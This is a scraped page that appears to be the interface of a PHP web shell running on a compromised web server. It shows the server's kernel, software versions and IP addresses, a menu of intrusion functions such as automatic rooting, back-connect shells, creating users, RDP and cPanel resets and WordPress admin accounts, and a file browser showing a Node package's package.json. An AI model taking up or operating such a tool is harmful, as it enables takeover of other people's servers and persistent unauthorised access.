Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
node_modules /
jake /
[ HOME SHELL ]
Name
Size
Permission
Action
bin
[ DIR ]
dr-xr-xr-x
lib
[ DIR ]
dr-xr-xr-x
test
[ DIR ]
dr-xr-xr-x
Makefile
1.29
KB
-rw-rw-rw-
README.md
556
B
-rw-rw-rw-
jakefile.js
2.62
KB
-rw-rw-rw-
package.json
953
B
-rw-rw-rw-
usage.txt
1.04
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "jake", "description": "JavaScript build tool, similar to Make or Rake", "keywords": [ "build", "cli", "make", "rake" ], "version": "10.9.2", "author": "Matthew Eernisse <mde@fleegix.org> (http://fleegix.org)", "license": "Apache-2.0", "bin": { "jake": "./bin/cli.js" }, "main": "./lib/jake.js", "scripts": { "lint": "eslint --format codeframe \"lib/**/*.js\" \"test/**/*.js\"", "lint:fix": "eslint --fix \"lib/**/*.js\" \"test/**/*.js\"", "test": "./bin/cli.js test", "test:ci": "npm run lint && npm run test" }, "repository": { "type": "git", "url": "git://github.com/jakejs/jake.git" }, "preferGlobal": true, "dependencies": { "async": "^3.2.3", "chalk": "^4.0.2", "filelist": "^1.0.4", "minimatch": "^3.1.2" }, "devDependencies": { "eslint": "^6.8.0", "mocha": "^10.2.0", "q": "^1.5.1" }, "engines": { "node": ">=10" } }
Close